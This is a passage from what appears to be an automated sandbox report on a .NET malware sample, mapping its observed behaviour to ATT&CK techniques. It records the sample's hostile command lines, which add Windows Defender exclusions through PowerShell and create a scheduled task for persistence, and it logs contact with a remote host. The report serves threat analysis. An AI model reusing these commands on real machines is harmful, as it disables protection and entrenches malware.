\"LoadLibrary\" with a parameter %WINDIR%\\system32\\uxtheme.dll (UID: 00000000-00004424)\n \"schtasks.exe\" called \"LoadLibrary\" with a parameter API-MS-Win-Security-LSALookup-L1-1-0.dll (UID: 00000000-00004424)\n \"vbc.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-sysinfo-l1-2-1 (UID: 00000000-00004880)\n \"vbc.exe\" called \"LoadLibrary\" with a parameter %WINDIR%\\system32\\ws2_32 (UID: 00000000-00004880)", "origin": "API Call", "attck_id": "T1129", "attck_id_wiki": "https://attack.mitre.org/techniques/T1129"}, {"threat_level_human": "informative", "category": "General", "identifier": "api-22", "type": 6, "relevance": 1, "name": "Fails to load modules at runtime", "description": "\"PCGB2GtVYuBR0mw.pif.exe\" failed to load missing module \"api-ms-win-core-fibers-l1-1-1\" - [base:0; Status:c0000135]\n \"PCGB2GtVYuBR0mw.pif.exe\" failed to load missing module \"api-ms-win-core-localization-l1-2-1\" - [base:0; Status:c0000135]\n \"PCGB2GtVYuBR0mw.pif.exe\" failed to load missing module \"api-ms-win-appmodel-runtime-l1-1-2.dll\" - [base:0; Status:c0000135]\n \"PCGB2GtVYuBR0mw.pif.exe\" failed to load missing module \"api-ms-win-appmodel-runtime-l1-1-0.dll\" - [base:0; Status:c0000135]\n \"PCGB2GtVYuBR0mw.pif.exe\" failed to load missing module \"api-ms-win-core-quirks-l1-1-0.dll\" - [base:0; Status:c0000135]\n \"PCGB2GtVYuBR0mw.pif.exe\" failed to load missing module \"%WINDIR%\\Microsoft.NET\\Framework\\v4.0.30319\\mscoree.dll\" - [base:0; Status:c0000135]\n \"PCGB2GtVYuBR0mw.pif.exe\" failed to load missing module \"%WINDIR%\\system32\\combase.dll\" - [base:0; Status:c0000135]\n \"PCGB2GtVYuBR0mw.pif.exe\" failed to load missing module \"%WINDIR%\\Microsoft.NET\\Framework\\v4.0.30319\\ole32.dll\" - [base:0; Status:c0000135]\n \"PCGB2GtVYuBR0mw.pif.exe\" failed to load missing module \"%WINDIR%\\Microsoft.Net\\assembly\\GAC_MSIL\\System.Windows.Forms\\v4.0_4.0.0.0__b77a5c561934e089\\uxtheme.dll\" - [base:0; Status:c0000135]\n \"PCGB2GtVYuBR0mw.pif.exe\" failed to load missing module \"%WINDIR%\\Microsoft.Net\\assembly\\GAC_32\\mscorlib\\v4.0_4.0.0.0__b77a5c561934e089\\bcrypt.dll\" - [base:0; Status:c0000135]\n \"PCGB2GtVYuBR0mw.pif.exe\" failed to load missing module \"amsi.dll\" - [base:0; Status:c0000135]\n \"PCGB2GtVYuBR0mw.pif.exe\" failed to load missing module \"%WINDIR%\\Microsoft.Net\\assembly\\GAC_MSIL\\System\\v4.0_4.0.0.0__b77a5c561934e089\\ntdll.dll\" - [base:0; Status:c0000135]\n \"PCGB2GtVYuBR0mw.pif.exe\" failed to load missing module \"%WINDIR%\\Microsoft.Net\\assembly\\GAC_MSIL\\System\\v4.0_4.0.0.0__b77a5c561934e089\\shell32.dll\" - [base:0; Status:c0000135]\n \"PCGB2GtVYuBR0mw.pif.exe\" failed to load missing module \"%WINDIR%\\Microsoft.Net\\assembly\\GAC_MSIL\\System\\v4.0_4.0.0.0__b77a5c561934e089\\psapi.dll\" - [base:0; Status:c0000135]\n \"powershell.exe\" failed to load missing module \"api-ms-win-core-fibers-l1-1-1\" - [base:0; Status:c0000135]\n \"powershell.exe\" failed to load missing module \"api-ms-win-core-localization-l1-2-1\" - [base:0; Status:c0000135]\n \"powershell.exe\" failed to load missing module \"api-ms-win-appmodel-runtime-l1-1-2.dll\" - [base:0; Status:c0000135]\n \"powershell.exe\" failed to load missing module \"api-ms-win-appmodel-runtime-l1-1-0.dll\" - [base:0; Status:c0000135]\n \"powershell.exe\" failed to load missing module \"api-ms-win-core-quirks-l1-1-0.dll\" - [base:0; Status:c0000135]\n \"powershell.exe\" failed to load missing module \"%WINDIR%\\Microsoft.NET\\Framework\\v4.0.30319\\mscoree.dll\" - [base:0; Status:c0000135]\n \"powershell.exe\" failed to load missing module \"%WINDIR%\\system32\\combase.dll\" - [base:0; Status:c0000135]\n \"powershell.exe\" failed to load missing module \"%WINDIR%\\Microsoft.NET\\Framework\\v4.0.30319\\ole32.dll\" - [base:0; Status:c0000135]\n \"powershell.exe\" failed to load missing module \"%WINDIR%\\Microsoft.Net\\assembly\\GAC_32\\mscorlib\\v4.0_4.0.0.0__b77a5c561934e089\\oleaut32.dll\" - [base:0; Status:c0000135]\n \"powershell.exe\" failed to load missing module \"%WINDIR%\\Microsoft.NET\\Framework\\v4.0.30319\\OLEAUT32.dll\" - [base:0; Status:c0000135]\n \"powershell.exe\" failed to load missing module \"%WINDIR%\\Microsoft.Net\\assembly\\GAC_MSIL\\System\\v4.0_4.0.0.0__b77a5c561934e089\\psapi.dll\" - [base:0; Status:c0000135]\n \"powershell.exe\" failed to load missing module \"%WINDIR%\\Microsoft.Net\\assembly\\GAC_32\\mscorlib\\v4.0_4.0.0.0__b77a5c561934e089\\shell32.dll\" - [base:0; Status:c0000135]\n \"powershell.exe\" failed to load missing module \"%WINDIR%\\Microsoft.Net\\assembly\\GAC_MSIL\\System.Management.Automation\\v4.0_3.0.0.0__31bf3856ad364e35\\wintrust.dll\" - [base:0; Status:c0000135]\n \"powershell.exe\" failed to load missing module \"%WINDIR%\\Microsoft.Net\\assembly\\GAC_MSIL\\System.Management.Automation\\v4.0_3.0.0.0__31bf3856ad364e35\\amsi.dll\" - [base:0; Status:c0000135]\n \"powershell.exe\" failed to load missing module \"amsi.dll\" - [base:0; Status:c0000135]\n \"powershell.exe\" failed to load missing module \"%WINDIR%\\Microsoft.Net\\assembly\\GAC_MSIL\\System\\v4.0_4.0.0.0__b77a5c561934e089\\ntdll.dll\" - [base:0; Status:c0000135]\n \"powershell.exe\" failed to load missing module \"%WINDIR%\\Microsoft.Net\\assembly\\GAC_32\\mscorlib\\v4.0_4.0.0.0__b77a5c561934e089\\secur32.dll\" - [base:0; Status:c0000135]\n \"powershell.exe\" failed to load missing module \"%WINDIR%\\Microsoft.Net\\assembly\\GAC_MSIL\\System.Management.Automation\\v4.0_3.0.0.0__31bf3856ad364e35\\shlwapi.dll\" - [base:0; Status:c0000135]\n \"powershell.exe\" failed to load missing module \"%WINDIR%\\Microsoft.NET\\Framework\\v4.0.30319\\urlmon.dll\" - [base:0; Status:c0000135]\n \"powershell.exe\" failed to load missing module \"%WINDIR%\\Microsoft.Net\\assembly\\GAC_MSIL\\System\\v4.0_4.0.0.0__b77a5c561934e089\\crypt32.dll\" - [base:0; Status:c0000135]\n \"powershell.exe\" failed to load missing module \"%WINDIR%\\Microsoft.NET\\Framework\\v4.0.30319\\CRYPT32.dll\" - [base:0; Status:c0000135]\n \"powershell.exe\" failed to load missing module \"%WINDIR%\\Microsoft.Net\\assembly\\GAC_32\\mscorlib\\v4.0_4.0.0.0__b77a5c561934e089\\bcrypt.dll\" - [base:0; Status:c0000135]\n \"schtasks.exe\" failed to load missing module \"api-ms-win-core-fibers-l1-1-1\" - [base:0; Status:c0000135]\n \"schtasks.exe\" failed to load missing module \"api-ms-win-core-localization-l1-2-1\" - [base:0; Status:c0000135]\n \"vbc.exe\" failed to load missing module \"api-ms-win-core-sysinfo-l1-2-1\" - [base:0; Status:c0000135]", "origin": "API Call", "attck_id": "T1574.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1574/002"}, {"threat_level_human": "informative", "category": "General", "identifier": "static-153", "name": "Uses 32 bit executable PE", "description": "\"PCGB2GtVYuBR0mw.pif\" has flags like IMAGE_FILE_32BIT_MACHINE\n IMAGE_FILE_EXECUTABLE\n \"SUbPwEbpBhA.exe\" has flags like IMAGE_FILE_32BIT_MACHINE\n IMAGE_FILE_EXECUTABLE", "origin": "Static Parser"}, {"threat_level_human": "informative", "category": "General", "identifier": "static-96", "name": "PE file entrypoint instructions", "description": "\"PCGB2GtVYuBR0mw.pif\" file has an entrypoint instructions - \"jmp\tdword ptr [0x402000],add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,\"\n \"SUbPwEbpBhA.exe\" file has an entrypoint instructions - \"jmp\tdword ptr [0x402000],add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,\"", "origin": "Static Parser"}, {"threat_level_human": "informative", "category": "General", "identifier": "static-144", "relevance": 1, "name": "PE file contains COM data directory", "description": "\"PCGB2GtVYuBR0mw.pif\" has COM data directory \"IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR\"\n \"SUbPwEbpBhA.exe\" has COM data directory \"IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR\"", "origin": "Static Parser"}, {"threat_level_human": "informative", "category": "General", "identifier": "module-10", "type": 10, "name": "Loads the RPC (Remote Procedure Call) module DLL", "description": "\"PCGB2GtVYuBR0mw.pif.exe\" loaded module \"%WINDIR%\\System32\\rpcrt4.dll\" at 758F0000\n \"powershell.exe\" loaded module \"%WINDIR%\\System32\\rpcrt4.dll\" at 758F0000\n \"schtasks.exe\" loaded module \"%WINDIR%\\System32\\rpcrt4.dll\" at 758F0000\n \"vbc.exe\" loaded module \"%WINDIR%\\System32\\rpcrt4.dll\" at 758F0000", "origin": "Loaded Module", "attck_id": "T1129", "attck_id_wiki": "https://attack.mitre.org/techniques/T1129"}, {"threat_level_human": "informative", "category": "General", "identifier": "module-7", "type": 10, "name": "Loads the CLR Loader DLL", "description": "\"PCGB2GtVYuBR0mw.pif.exe\" loaded module \"%WINDIR%\\Microsoft.NET\\Framework\\v4.0.30319\\clr.dll\" at 686E0000\n \"PCGB2GtVYuBR0mw.pif.exe\" loaded module \"%WINDIR%\\Microsoft.NET\\Framework\\v4.0.30319\\clr.dll\" at 68E90000\n \"powershell.exe\" loaded module \"%WINDIR%\\Microsoft.NET\\Framework\\v4.0.30319\\clr.dll\" at 68E90000", "origin": "Loaded Module", "attck_id": "T1620", "attck_id_wiki": "https://attack.mitre.org/techniques/T1620"}, {"threat_level_human": "informative", "category": "General", "identifier": "registry-25", "type": 3, "relevance": 3, "name": "Reads information about supported languages", "description": "\"PCGB2GtVYuBR0mw.pif.exe\" (Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\NLS\\CUSTOMLOCALE\"; Key: \"EN-US\")\n \"PCGB2GtVYuBR0mw.pif.exe\" (Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\NLS\\EXTENDEDLOCALE\"; Key: \"EN-US\")\n \"PCGB2GtVYuBR0mw.pif.exe\" (Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\NLS\\LOCALE\"; Key: \"00000409\")\n \"PCGB2GtVYuBR0mw.pif.exe\" (Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\NLS\\CUSTOMLOCALE\"; Key: \"EN\")\n \"PCGB2GtVYuBR0mw.pif.exe\" (Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\NLS\\EXTENDEDLOCALE\"; Key: \"EN\")\n \"powershell.exe\" (Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\NLS\\CUSTOMLOCALE\"; Key: \"EN-US\")\n \"powershell.exe\" (Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\NLS\\EXTENDEDLOCALE\"; Key: \"EN-US\")\n \"powershell.exe\" (Path: \"HKCU\\CONTROL PANEL\\INTERNATIONAL\"; Key: \"SYEARMONTH\")\n \"powershell.exe\" (Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\NLS\\LOCALE\"; Key: \"00000409\")\n \"powershell.exe\" (Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\NLS\\CUSTOMLOCALE\"; Key: \"AR\")\n \"powershell.exe\" (Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\NLS\\EXTENDEDLOCALE\"; Key: \"AR\")\n \"powershell.exe\" (Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\NLS\\CUSTOMLOCALE\"; Key: \"AR-SA\")\n \"powershell.exe\" (Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\NLS\\EXTENDEDLOCALE\"; Key: \"AR-SA\")\n \"powershell.exe\" (Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\NLS\\CUSTOMLOCALE\"; Key: \"BG\")\n \"powershell.exe\" (Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\NLS\\EXTENDEDLOCALE\"; Key: \"BG\")\n \"powershell.exe\" (Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\NLS\\CUSTOMLOCALE\"; Key: \"BG-BG\")\n \"powershell.exe\" (Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\NLS\\EXTENDEDLOCALE\"; Key: \"BG-BG\")\n \"powershell.exe\" (Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\NLS\\CUSTOMLOCALE\"; Key: \"CA\")\n \"powershell.exe\" (Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\NLS\\EXTENDEDLOCALE\"; Key: \"CA\")", "origin": "Registry Access", "attck_id": "T1082", "attck_id_wiki": "https://attack.mitre.org/techniques/T1082"}, {"threat_level_human": "informative", "category": "General", "identifier": "target-103", "type": 9, "relevance": 3, "name": "Spawns new processes that are not known child processes", "description": "Spawned process \"powershell.exe\" with commandline \"Add-MpPreference -ExclusionPath \"C:\\\\PCGB2GtVYuBR0mw.pif.exe\"\" (UID: 00000000-00004784)\n Spawned process \"powershell.exe\" with commandline \"Add-MpPreference -ExclusionPath \"%APPDATA%\\\\SUbPwEbpBhA.exe\"\" (UID: 00000000-00004640)\n Spawned process \"schtasks.exe\" with commandline \"/Create /TN \"Updates\\\\SUbPwEbpBhA\" /XML \"%TEMP%\\\\tmp2F3B.tmp\"\" (UID: 00000000-00004424)\n Spawned process \"vbc.exe\" (UID: 00000000-00000508)\n Spawned process \"vbc.exe\" (UID: 00000000-00001584)\n Spawned process \"vbc.exe\" (UID: 00000000-00004880)", "origin": "Monitored Target", "attck_id": "T1057", "attck_id_wiki": "https://attack.mitre.org/techniques/T1057"}, {"threat_level_human": "informative", "category": "General", "identifier": "api-176", "type": 6, "relevance": 1, "name": "Calls an API typically used to retrieve function addresses", "description": "details too long to display", "origin": "API Call", "attck_id": "T1106", "attck_id_wiki": "https://attack.mitre.org/techniques/T1106"}, {"threat_level_human": "informative", "category": "General", "identifier": "target-67", "type": 9, "relevance": 10, "name": "Process launched with changed environment", "description": "Process \"powershell.exe\" (UID: 00000000-00004784) was launched with modified environment variables: \"Path\"\n Process \"schtasks.exe\" (UID: 00000000-00004424) was launched with modified environment variables: \"Path\"", "origin": "Monitored Target", "attck_id": "T1057", "attck_id_wiki": "https://attack.mitre.org/techniques/T1057"}, {"threat_level_human": "informative", "category": "General", "identifier": "api-8", "type": 6, "relevance": 1, "name": "Looks up procedures from modules (excluding apphelp.dll, kernel32.dll, user32.dll, gdi32.dll, ole32.dll, comctl32.dll, uxtheme.dll, oleaut32.dll, version.dll, msctfime.ime)", "description": "\"15001600c03ef971@ADVAPI32.dll\"\n \"0e000f00703ff971@ADVAPI32.dll\"\n \"0e000f00cc3ff971@ADVAPI32.dll\"\n \"11001200b447f971@ADVAPI32.dll\"\n \"110012004848f971@ADVAPI32.dll\"\n \"120013008c48f971@ADVAPI32.dll\"\n \"12001300e448f971@ADVAPI32.dll\"\n \"14001500386ef971@ADVAPI32.dll\"\n \"14001500506ef971@ADVAPI32.dll\"\n \"14001500686ef971@ADVAPI32.dll\"\n \"17001800806ef971@ADVAPI32.dll\"\n \"0d000e00986ef971@ADVAPI32.dll\"\n \"11001200a86ef971@ADVAPI32.dll\"\n \"11001200bc6ef971@ADVAPI32.dll\"\n \"0f001000fc6ff971@ADVAPI32.dll\"\n \"140015003c70f971@ADVAPI32.dll\"\n \"140015005470f971@ADVAPI32.dll\"\n \"0c000d009c70f971@ADVAPI32.dll\"\n \"0c000d00ac70f971@ADVAPI32.dll\"\n \"0e000f00bc70f971@ADVAPI32.dll\"\n \"0e000f00cc70f971@ADVAPI32.dll\"\n \"0b000c00dc70f971@ADVAPI32.dll\"\n \"180019001473f971@RPCRT4.dll\"\n \"130014004073f971@RPCRT4.dll\"\n \"140015005473f971@RPCRT4.dll\"", "origin": "API Call", "attck_id": "T1129", "attck_id_wiki": "https://attack.mitre.org/techniques/T1129"}, {"threat_level_human": "informative", "category": "General", "identifier": "target-25", "type": 9, "relevance": 3, "name": "Spawns new processes", "description": "Spawned process \"powershell.exe\" with commandline \"Add-MpPreference -ExclusionPath \"C:\\\\PCGB2GtVYuBR0mw.pif.exe\"\" (UID: 00000000-00004784)\n Spawned process \"powershell.exe\" with commandline \"Add-MpPreference -ExclusionPath \"%APPDATA%\\\\SUbPwEbpBhA.exe\"\" (UID: 00000000-00004640)\n Spawned process \"schtasks.exe\" with commandline \"/Create /TN \"Updates\\\\SUbPwEbpBhA\" /XML \"%TEMP%\\\\tmp2F3B.tmp\"\" (UID: 00000000-00004424)\n Spawned process \"vbc.exe\" (UID: 00000000-00000508)\n Spawned process \"vbc.exe\" (UID: 00000000-00001584)\n Spawned process \"vbc.exe\" (UID: 00000000-00004880)", "origin": "Monitored Target", "attck_id": "T1057", "attck_id_wiki": "https://attack.mitre.org/techniques/T1057"}, {"threat_level_human": "informative", "category": "General", "identifier": "api-122", "type": 6, "relevance": 3, "name": "Calls an API typically used to create a directory", "description": "\"PCGB2GtVYuBR0mw.pif.exe\" called \"CreateDirectoryW\" with parameter C:\\Users\\%OSUSER% (UID: 00000000-00002912)\n \"PCGB2GtVYuBR0mw.pif.exe\" called \"CreateDirectoryW\" with parameter %USERPROFILE%\\AppData\\Roaming (UID: 00000000-00002912)\n \"PCGB2GtVYuBR0mw.pif.exe\" called \"CreateDirectoryW\" with parameter %LOCALAPPDATA%\\Microsoft\\Windows\\Caches (UID: 00000000-00002912)\n \"powershell.exe\" called \"CreateDirectoryW\" with parameter C:\\Users\\%OSUSER% (UID: 00000000-00004784)\n \"powershell.exe\" called \"CreateDirectoryW\" with parameter %USERPROFILE%\\AppData\\Roaming (UID: 00000000-00004784)\n \"powershell.exe\" called \"CreateDirectoryW\" with parameter C:\\Users\\%OSUSER% (UID: 00000000-00004640)\n \"powershell.exe\" called \"CreateDirectoryW\" with parameter %USERPROFILE%\\AppData\\Roaming (UID: 00000000-00004640)\n \"vbc.exe\" called \"CreateDirectoryW\" with parameter %ALLUSERSPROFILE%\\hytg (UID: 00000000-00004880)", "origin": "API Call", "attck_id": "T1074.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1074/001"}, {"threat_level_human": "informative", "category": "General", "identifier": "static-157", "name": "Matched Compiler/Packer signature (DIE)", "description": "\"PCGB2GtVYuBR0mw.pif\" was detected as \".NET\" and name: \"Library\"\n \"PCGB2GtVYuBR0mw.pif\" was detected as \"VB.NET\" and name: \"Compiler\"\n \"PCGB2GtVYuBR0mw.pif\" was detected as \"Microsoft Linker\" and name: \"Linker\"\n \"SUbPwEbpBhA.exe\" was detected as \".NET\" and name: \"Library\"\n \"SUbPwEbpBhA.exe\" was detected as \"VB.NET\" and name: \"Compiler\"\n \"SUbPwEbpBhA.exe\" was detected as \"Microsoft Linker\" and name: \"Linker\"", "origin": "Static Parser", "attck_id": "T1027", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027"}, {"threat_level_human": "informative", "category": "General", "identifier": "static-124", "relevance": 3, "name": "PE file has a big virtual size section", "description": "Virtual size of \".text\" is \"0x12f268\" greater than 0x100000", "origin": "Static Parser"}, {"threat_level_human": "informative", "category": "General", "identifier": "api-128", "type": 6, "relevance": 5, "name": "Calls an API typically used to create a process", "description": "\"PCGB2GtVYuBR0mw.pif.exe\" called \"CreateProcessW\" with parameter \"\"%WINDIR%\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" Add-MpPreference -ExclusionPath \"C:\\PCGB2GtVYuBR0mw.pif.exe\"\" - (UID: 00000000-00002912)\n \"PCGB2GtVYuBR0mw.pif.exe\" called \"CreateProcessW\" with parameter \"\"%WINDIR%\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" Add-MpPreference -ExclusionPath \"%APPDATA%\\SUbP\" - (UID: 00000000-00002912), \"PCGB2GtVYuBR0mw.pif.exe\" called \"CreateProcessW\" with parameter \"\"%WINDIR%\\System32\\schtasks.exe\" /Create /TN \"Updates\\SUbPwEbpBhA\" /XML \"%TEMP%\\tmp2F3B.tmp\"\" - (UID: 00000000-00002912), \"PCGB2GtVYuBR0mw.pif.exe\" called \"CreateProcessA\" with parameter \"%WINDIR%\\Microsoft.NET\\Framework\\v4.0.30319\\vbc.exe\" - (UID: 00000000-00002912)", "origin": "API Call", "attck_id": "T1106", "attck_id_wiki": "https://attack.mitre.org/techniques/T1106"}, {"threat_level_human": "informative", "category": "General", "identifier": "static-154", "name": "File contains dynamic base/NX flags", "description": "\"PCGB2GtVYuBR0mw.pif\" has flags like IMAGE_DLLCHARACTERISTICS_NO_SEH\n IMAGE_DLLCHARACTERISTICS_TERMINAL_SERVER_AWARE\n IMAGE_DLLCHARACTERISTICS_DYNAMIC_BASE\n IMAGE_DLLCHARACTERISTICS_NX_COMPAT\n IMAGE_DLLCHARACTERISTICS_HIGH_ENTROPY_VA\n \"SUbPwEbpBhA.exe\" has flags like IMAGE_DLLCHARACTERISTICS_NO_SEH\n IMAGE_DLLCHARACTERISTICS_TERMINAL_SERVER_AWARE\n IMAGE_DLLCHARACTERISTICS_DYNAMIC_BASE\n IMAGE_DLLCHARACTERISTICS_NX_COMPAT\n IMAGE_DLLCHARACTERISTICS_HIGH_ENTROPY_VA", "origin": "Static Parser"}, {"threat_level_human": "informative", "category": "General", "identifier": "registry-20", "type": 3, "relevance": 5, "name": "Reads Windows Trust Settings", "description": "\"powershell.exe\" (Path: \"HKCU\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\WINTRUST\\TRUST PROVIDERS\\SOFTWARE PUBLISHING\"; Key: \"STATE\")", "origin": "Registry Access", "attck_id": "T1012", "attck_id_wiki": "https://attack.mitre.org/techniques/T1012"}, {"threat_level_human": "informative", "category": "General", "identifier": "registry-17", "type": 3, "relevance": 10, "name": "Accesses System Certificates Settings", "description": "\"powershell.exe\" (Path: \"HKLM\\SOFTWARE\\MICROSOFT\\SYSTEMCERTIFICATES\\AUTHROOT\\AUTOUPDATE\"; Key: \"DISALLOWEDCERTSYNCDELTATIME\")\n \"powershell.exe\" (Path: \"HKCU\\SOFTWARE\\MICROSOFT\\SYSTEMCERTIFICATES\\MY\"; Key: \"\")\n \"powershell.exe\" (Path: \"HKCU\\SOFTWARE\\MICROSOFT\\SYSTEMCERTIFICATES\\CA\"; Key: \"\")\n \"powershell.exe\" (Path: \"HKCU\\SOFTWARE\\MICROSOFT\\SYSTEMCERTIFICATES\\CA\\CERTIFICATES\"; Key: \"\")\n \"powershell.exe\" (Path: \"HKCU\\SOFTWARE\\MICROSOFT\\SYSTEMCERTIFICATES\\CA\\CERTIFICATES\\2E4916B07F3DE90C8DDE2566FD9B9B400D89BBBA\"; Key: \"BLOB\")\n \"powershell.exe\" (Path: \"HKCU\\SOFTWARE\\MICROSOFT\\SYSTEMCERTIFICATES\\CA\\CERTIFICATES\\5AEAEE3F7F2A9449CEBAFEEC68FDD184F20124A7\"; Key: \"BLOB\")\n \"powershell.exe\" (Path: \"HKCU\\SOFTWARE\\MICROSOFT\\SYSTEMCERTIFICATES\\CA\\CERTIFICATES\\E6A3B45B062D509B3382282D196EFE97D5956CCB\"; Key: \"BLOB\")\n \"powershell.exe\" (Path: \"HKCU\\SOFTWARE\\MICROSOFT\\SYSTEMCERTIFICATES\\CA\\CERTIFICATES\\F5AD0BCC1AD56CD150725B1C866C30AD92EF21B0\"; Key: \"BLOB\")\n \"powershell.exe\" (Path: \"HKCU\\SOFTWARE\\MICROSOFT\\SYSTEMCERTIFICATES\\CA\\CRLS\"; Key: \"\")\n \"powershell.exe\" (Path: \"HKCU\\SOFTWARE\\MICROSOFT\\SYSTEMCERTIFICATES\\CA\\CTLS\"; Key: \"\")\n \"powershell.exe\" (Path: \"HKLM\\SOFTWARE\\MICROSOFT\\SYSTEMCERTIFICATES\\CA\"; Key: \"\")\n \"powershell.exe\" (Path: \"HKLM\\SOFTWARE\\MICROSOFT\\SYSTEMCERTIFICATES\\CA\\CERTIFICATES\"; Key: \"\")\n \"powershell.exe\" (Path: \"HKLM\\SOFTWARE\\MICROSOFT\\SYSTEMCERTIFICATES\\CA\\CERTIFICATES\\109F1CAED645BB78B3EA2B94C0697C740733031C\"; Key: \"BLOB\")", "origin": "Registry Access", "attck_id": "T1112", "attck_id_wiki": "https://attack.mitre.org/techniques/T1112"}, {"threat_level_human": "informative", "category": "General", "identifier": "network-1", "type": 7, "relevance": 1, "name": "Contacts server", "description": "\"<IPv4>:2247\"", "origin": "Network Traffic", "attck_id": "T1071", "attck_id_wiki": "https://attack.mitre.org/techniques/T1071"}, {"threat_level_human": "informative", "category": "General", "identifier": "network-51", "type": 7, "relevance": 1, "name": "Queries DNS server", "description": "\"tjwpn04kn.localto.net\"", "origin": "Network Traffic", "attck_id": "T1071.004", "attck_id_wiki": "https://attack.mitre.org/techniques/T1071/004"}, {"threat_level_human": "informative", "category": "General", "identifier": "static-125", "relevance": 3, "name": "PE file has a big raw size section", "description": "Raw size of \".text\" is \"0x12f400\" greater than 0x100000", "origin": "Static Parser"}, {"threat_level_human": "informative", "category": "General", "identifier": "static-80", "relevance": 1, "name": "PE file contains executable sections", "description": "\"PCGB2GtVYuBR0mw.pif\" has an executable section named \".text\"\n \"SUbPwEbpBhA.exe\" has an executable section named \".text\"", "origin": "Static Parser"}, {"threat_level_human": "informative", "category": "Unusual Characteristics", "identifier": "static-18", "relevance": 10, "name": "Matched Compiler/Packer signature", "description": "\"PCGB2GtVYuBR0mw.pif\" was detected as \"Microsoft visual C# v7.0 / Basic .NET\"\n \"SUbPwEbpBhA.exe\" was detected as \"Microsoft visual C# v7.0 / Basic .NET\"", "origin": "Static Parser", "attck_id": "T1027.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027/002"}, {"threat_level_human": "informative", "category": "Unusual Characteristics", "identifier": "registry-26", "type": 3, "relevance": 2, "name": "Reads the windows installation language", "description": "\"PCGB2GtVYuBR0mw.pif.exe\" (Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\NLS\\LANGUAGE GROUPS\"; Key: \"1\")\n \"powershell.exe\" (Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\NLS\\LANGUAGE GROUPS\"; Key: \"1\")", "origin": "Registry Access", "attck_id": "T1614.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1614/001"}, {"threat_level_human": "informative", "category": "Unusual Characteristics", "identifier": "binary-37", "type": 8, "relevance": 3, "name": "Drops files inside appdata directory", "description": "Dropped file: \"SUbPwEbpBhA.exe\" - Location: 